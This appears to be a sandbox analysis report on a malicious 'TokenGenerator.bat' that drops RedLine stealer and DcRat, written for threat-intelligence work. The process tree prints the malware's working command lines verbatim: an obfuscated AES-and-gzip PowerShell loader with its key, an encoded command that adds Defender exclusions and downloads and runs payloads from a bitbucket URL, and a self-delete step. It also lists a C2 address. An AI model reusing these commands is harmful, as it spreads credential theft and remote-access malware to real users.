dcrat | 97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b

Resubmissions

29-08-2022 03:50

220829-ed6vwacdc8 10

29-08-2022 03:47

220829-ecjc7acda5 10

Analysis

max time kernel
45s
max time network
50s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
29-08-2022 03:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TokenGenerator.bat
Size

24KB
MD5

e85403a4491b4ed319390201a735de7d
SHA1

bf93b11ce5d33046c8a110bff05d4c0e6b1d90a2
SHA256

97b786b850b37408f96541ba898f6f0032eecf76f6cb1f59ca8c750c5721688b
SHA512

d73ede4bae6b6cab73f46e7d7dda812fc1317ba6e1d0efff5d1ebca3015395b6ffa8c385b2005ec23603c835b478ea77c1ceba3ea12232e614604155e48e5859
SSDEEP

384:I55wqklVZlT/pHazFwZWvjKlFYatnvaY5o9GFIxqvFOcueWrC9:GY7azFwZSjKltvh5og6tcN8C9

Score

10^/10

dcrat redline dv infostealer rat

Malware Config

Extracted

Family

redline

Botnet

195.3.223.79:65252

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1.exe	family_redline
behavioral2/memory/4284-352-0x0000000000650000-0x000000000066E000-memory.dmp	family_redline

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\3.exe	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 3456 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

TokenGenerator.bat.exe1.exe2.exe3.exe

pid process

1292 TokenGenerator.bat.exe
4284 1.exe
4812 2.exe
4892 3.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

flow	pid	process
2	3456	powershell.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

TokenGenerator.bat.exepowershell.exepowershell.exepowershell.exe

pid	process
1292	TokenGenerator.bat.exe
1292	TokenGenerator.bat.exe
1292	TokenGenerator.bat.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

TokenGenerator.bat.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1292	TokenGenerator.bat.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeIncreaseQuotaPrivilege	3456	powershell.exe
Token: SeSecurityPrivilege	3456	powershell.exe
Token: SeTakeOwnershipPrivilege	3456	powershell.exe
Token: SeLoadDriverPrivilege	3456	powershell.exe
Token: SeSystemProfilePrivilege	3456	powershell.exe
Token: SeSystemtimePrivilege	3456	powershell.exe
Token: SeProfSingleProcessPrivilege	3456	powershell.exe
Token: SeIncBasePriorityPrivilege	3456	powershell.exe
Token: SeCreatePagefilePrivilege	3456	powershell.exe
Token: SeBackupPrivilege	3456	powershell.exe
Token: SeRestorePrivilege	3456	powershell.exe
Token: SeShutdownPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeSystemEnvironmentPrivilege	3456	powershell.exe
Token: SeRemoteShutdownPrivilege	3456	powershell.exe
Token: SeUndockPrivilege	3456	powershell.exe
Token: SeManageVolumePrivilege	3456	powershell.exe
Token: 33	3456	powershell.exe
Token: 34	3456	powershell.exe
Token: 35	3456	powershell.exe
Token: 36	3456	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeIncreaseQuotaPrivilege	2696	powershell.exe
Token: SeSecurityPrivilege	2696	powershell.exe
Token: SeTakeOwnershipPrivilege	2696	powershell.exe
Token: SeLoadDriverPrivilege	2696	powershell.exe
Token: SeSystemProfilePrivilege	2696	powershell.exe
Token: SeSystemtimePrivilege	2696	powershell.exe
Token: SeProfSingleProcessPrivilege	2696	powershell.exe
Token: SeIncBasePriorityPrivilege	2696	powershell.exe
Token: SeCreatePagefilePrivilege	2696	powershell.exe
Token: SeBackupPrivilege	2696	powershell.exe
Token: SeRestorePrivilege	2696	powershell.exe
Token: SeShutdownPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeSystemEnvironmentPrivilege	2696	powershell.exe
Token: SeRemoteShutdownPrivilege	2696	powershell.exe
Token: SeUndockPrivilege	2696	powershell.exe
Token: SeManageVolumePrivilege	2696	powershell.exe
Token: 33	2696	powershell.exe
Token: 34	2696	powershell.exe
Token: 35	2696	powershell.exe
Token: 36	2696	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

cmd.exenet.exeTokenGenerator.bat.execmd.exepowershell.exe2.exe

description	pid	process	target process
PID 888 wrote to memory of 1136	888	cmd.exe	net.exe
PID 888 wrote to memory of 1136	888	cmd.exe	net.exe
PID 1136 wrote to memory of 1268	1136	net.exe	net1.exe
PID 1136 wrote to memory of 1268	1136	net.exe	net1.exe
PID 888 wrote to memory of 1292	888	cmd.exe	TokenGenerator.bat.exe
PID 888 wrote to memory of 1292	888	cmd.exe	TokenGenerator.bat.exe
PID 1292 wrote to memory of 3456	1292	TokenGenerator.bat.exe	powershell.exe
PID 1292 wrote to memory of 3456	1292	TokenGenerator.bat.exe	powershell.exe
PID 1292 wrote to memory of 4312	1292	TokenGenerator.bat.exe	cmd.exe
PID 1292 wrote to memory of 4312	1292	TokenGenerator.bat.exe	cmd.exe
PID 4312 wrote to memory of 4408	4312	cmd.exe	choice.exe
PID 4312 wrote to memory of 4408	4312	cmd.exe	choice.exe
PID 3456 wrote to memory of 3508	3456	powershell.exe	powershell.exe
PID 3456 wrote to memory of 3508	3456	powershell.exe	powershell.exe
PID 4312 wrote to memory of 5000	4312	cmd.exe	attrib.exe
PID 4312 wrote to memory of 5000	4312	cmd.exe	attrib.exe
PID 3456 wrote to memory of 4284	3456	powershell.exe	1.exe
PID 3456 wrote to memory of 4284	3456	powershell.exe	1.exe
PID 3456 wrote to memory of 4284	3456	powershell.exe	1.exe
PID 3456 wrote to memory of 4812	3456	powershell.exe	2.exe
PID 3456 wrote to memory of 4812	3456	powershell.exe	2.exe
PID 3456 wrote to memory of 4892	3456	powershell.exe	3.exe
PID 3456 wrote to memory of 4892	3456	powershell.exe	3.exe
PID 3456 wrote to memory of 4892	3456	powershell.exe	3.exe
PID 4812 wrote to memory of 2696	4812	2.exe	powershell.exe
PID 4812 wrote to memory of 2696	4812	2.exe	powershell.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

5000 attrib.exe

pid	process
5000	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:1268

C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe
"TokenGenerator.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $yNMNp = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat').Split([Environment]::NewLine);foreach ($DUpwR in $yNMNp) { if ($DUpwR.StartsWith(':: ')) { $zpFYG = $DUpwR.Substring(3); break; }; };$NDpIw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zpFYG);$FglUn = New-Object System.Security.Cryptography.AesManaged;$FglUn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$FglUn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$FglUn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xe8pXJdA3AONCe1Zlyq3gqv0U2vVZ+ZFx6YQNe5/72I=');$FglUn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6rOZj0Gc5fVio24RyZePg==');$tMNPD = $FglUn.CreateDecryptor();$NDpIw = $tMNPD.TransformFinalBlock($NDpIw, 0, $NDpIw.Length);$tMNPD.Dispose();$FglUn.Dispose();$duObo = New-Object System.IO.MemoryStream(, $NDpIw);$yiuvK = New-Object System.IO.MemoryStream;$VgABR = New-Object System.IO.Compression.GZipStream($duObo, [IO.Compression.CompressionMode]::Decompress);$VgABR.CopyTo($yiuvK);$VgABR.Dispose();$duObo.Dispose();$yiuvK.Dispose();$NDpIw = $yiuvK.ToArray();$DvMBT = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($NDpIw);$pFgMM = $DvMBT.EntryPoint;$pFgMM.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHAAcQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAHMAIAAvACAAVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGYAegBpACMAPgA7ACIAOwA8ACMAcgBuAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGoAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHAAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBrAHgAYwAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AZABlAHYALgBlAHgAZQAnACwAIAA8ACMAZgBzAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAGQAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAG0AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApACkAPAAjAHgAawBmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADEANwAxADcALwBnAHIAZwBlAHIAZQByAGcAcgBlAGcAZwAvAHIAYQB3AC8ANwA0AGUAYgAwADMAZgA3AGMAOAA0ADgAMwA1AGMAMgBlADEAMgA1ADYAYgA0AGIANwA4ADIAOAA1ADgANwBjAGIANgA4ADcANQA2ADgANQAvAGgAYQBmAHUAawAuAGUAeABlACcALAAgADwAIwB5AGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAYQBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAcQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAYwBtAHEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIAMQA3ADEANwAvAGcAcgBnAGUAcgBlAHIAZwByAGUAZwBnAC8AcgBhAHcALwA3ADQAZQBiADAAMwBmADcAYwA4ADQAOAAzADUAYwAyAGUAMQAyADUANgBiADQAYgA3ADgAMgA4ADUAOAA3AGMAYgA2ADgANwA1ADYAOAA1AC8AbgBvAGIAbwB5AC4AZQB4AGUAJwAsACAAPAAjAG4AZABrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwB4AHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBuAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwBqAGwAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHMAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAeAB0AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAZQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGoAdQByACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAaABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwB6AHQAeAAjAD4A"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#pqn#>[System.Windows.Forms.MessageBox]::Show('No VMs / VPS allowed!','','OK','Error')<#fzi#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
4⤵
- Executes dropped EXE
PID:4284

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Users\Admin\AppData\Local\Temp\3.exe
"C:\Users\Admin\AppData\Local\Temp\3.exe"
4⤵
- Executes dropped EXE
PID:4892

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe"
5⤵
PID:4776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:4408

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe"
4⤵
- Views/modifies file attributes
PID:5000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
83c4d165396a8d52c62d0f9a4687717c

SHA1
050a6b76f55e468e8868e31bbc91b54e94f3bc3e

SHA256
de384fc72d8814c341ab8b8e009679dafdbd3a7ef751f1a01199a1d984a42bde

SHA512
670c8812a1635ff4fed4c26ac0198cd905e74a8f8045217a77e0447acc62ca761586ad9cb93fd3e81533ebda88bccfcfac5dbce814f193901840e85558e13ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d49a529c639c47764609918a0415ec03

SHA1
4b3234adc8419f6c73ef819c8cc2fa871f7a21e7

SHA256
71cd2cd2f7ab15b27521617649d9a007ed68902709c4121d7d36d45767d44333

SHA512
009658b4fdfa0c2fbb53c9881f9015f483d0823547081dcd36cd3196458a668f471db4bd45eecd47c298afce0b05d8c05b72750a7ebe886d07e22f253b6a8f4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c9c7683410fbe96902d91c672de5f71

SHA1
84592ff7c99f312bc02e09d1015cbe8a699b3bbf

SHA256
723d9d21e2e300e525b583cdc8277477bbf9b212694f70abaa738259cd57dffb

SHA512
65c4e94c4db46d91ce8077868b2d62ff24c1d52dd2effc623e038c98f171c7b8c25317757c77327a15f31c968172801afe82cc91fd571db4d3883498a6807aed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c9c7683410fbe96902d91c672de5f71

SHA1
84592ff7c99f312bc02e09d1015cbe8a699b3bbf

SHA256
723d9d21e2e300e525b583cdc8277477bbf9b212694f70abaa738259cd57dffb

SHA512
65c4e94c4db46d91ce8077868b2d62ff24c1d52dd2effc623e038c98f171c7b8c25317757c77327a15f31c968172801afe82cc91fd571db4d3883498a6807aed

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe

Filesize
216B

MD5
83c65c5fb5d6cae5d1a56338d81546d8

SHA1
da674eea76da502aeba2c0a63d551dc9d243c561

SHA256
c4010b41b3ee553d967decf86d7856464f9ae29bfd5334cd602f24cd14424783

SHA512
0d5b0b94d8ec8d53539044ab5805547c12cbe4ca87d0c74e5b768f1904794a820a3fd5e662dc16d0232c60efc1491c79731975f55b2da12139d70e4ef8d1f9b6

Download Submit
memory/1136-120-0x0000000000000000-mapping.dmp

Download
memory/1268-121-0x0000000000000000-mapping.dmp

Download
memory/1292-122-0x0000000000000000-mapping.dmp

Download
memory/1292-128-0x0000028B2E520000-0x0000028B2E542000-memory.dmp

Filesize
136KB

Download
memory/1292-133-0x0000028B2E720000-0x0000028B2E796000-memory.dmp

Filesize
472KB

Download
memory/1292-140-0x0000028B2E580000-0x0000028B2E58A000-memory.dmp

Filesize
40KB

Download
memory/1292-142-0x0000028B2E6B0000-0x0000028B2E6B8000-memory.dmp

Filesize
32KB

Download
memory/2696-259-0x0000000000000000-mapping.dmp

Download
memory/3456-149-0x0000000000000000-mapping.dmp

Download
memory/3508-174-0x0000000000000000-mapping.dmp

Download
memory/4284-233-0x0000000000000000-mapping.dmp

Download
memory/4284-333-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-251-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-324-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-405-0x0000000005170000-0x000000000527A000-memory.dmp

Filesize
1.0MB

Download
memory/4284-247-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-240-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-392-0x0000000004E80000-0x0000000004ECB000-memory.dmp

Filesize
300KB

Download
memory/4284-235-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-377-0x0000000004EE0000-0x0000000004F1E000-memory.dmp

Filesize
248KB

Download
memory/4284-320-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-362-0x0000000004E60000-0x0000000004E72000-memory.dmp

Filesize
72KB

Download
memory/4284-356-0x00000000054F0000-0x0000000005AF6000-memory.dmp

Filesize
6.0MB

Download
memory/4284-266-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-352-0x0000000000650000-0x000000000066E000-memory.dmp

Filesize
120KB

Download
memory/4284-350-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-349-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-273-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-274-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-348-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-325-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-243-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-286-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-281-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-284-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-347-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-288-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-290-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-336-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-344-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-343-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-294-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-337-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-341-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
memory/4284-292-0x0000000077A90000-0x0000000077C1E000-memory.dmp

Filesize
1.6MB

Download
